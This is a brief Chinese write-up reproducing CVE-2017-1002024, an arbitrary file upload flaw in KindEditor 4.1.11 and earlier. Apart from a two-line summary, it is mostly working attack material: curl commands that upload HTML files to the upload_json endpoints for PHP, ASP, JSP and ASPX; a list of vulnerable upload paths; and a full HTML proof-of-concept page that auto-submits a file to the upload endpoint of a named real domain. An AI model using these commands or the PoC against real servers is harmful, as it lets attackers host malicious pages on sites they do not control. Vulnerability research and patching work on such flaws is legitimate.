(CVE-2017-1002024)Kindeditor \<=4.1.11 上传漏洞
一、漏洞简介
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中
二、漏洞影响
Kindeditor \<=4.1.11
三、复现过程
curl -F"[email protected]" http://127.0.0.1/kindeditor/php/upload_json.php?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/asp/upload_json.asp?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/jsp/upload_json.jsp?dir=file
curl -F"[email protected]" http://127.0.0.1/kindeditor/aspx/upload_json.aspx?dir=file
```返回值为路径
json文件地址
/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php
上传路径
kindeditor/asp/upload_json.asp?dir=file
kindeditor/asp.net/upload_json.ashx?dir=file
kindeditor/jsp/upload_json.jsp?dir=file
kindeditor/php/upload_json.php?dir=file
查看版本信息
http://www.0-sec.org/kindeditor//kindeditor.js
构造poc
<html><head>
<title>Uploader</title>
<script src="http://www.0-sec.org/kindeditor//kindeditor.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K(‘#uploadButton‘)[0],
fieldName : ‘imgFile‘,
url : ‘http://www.0-sec.org/kindeditor/jsp/upload_json.jsp?dir=file‘,
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, ‘absolute‘);
K(‘#url‘).val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div>
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>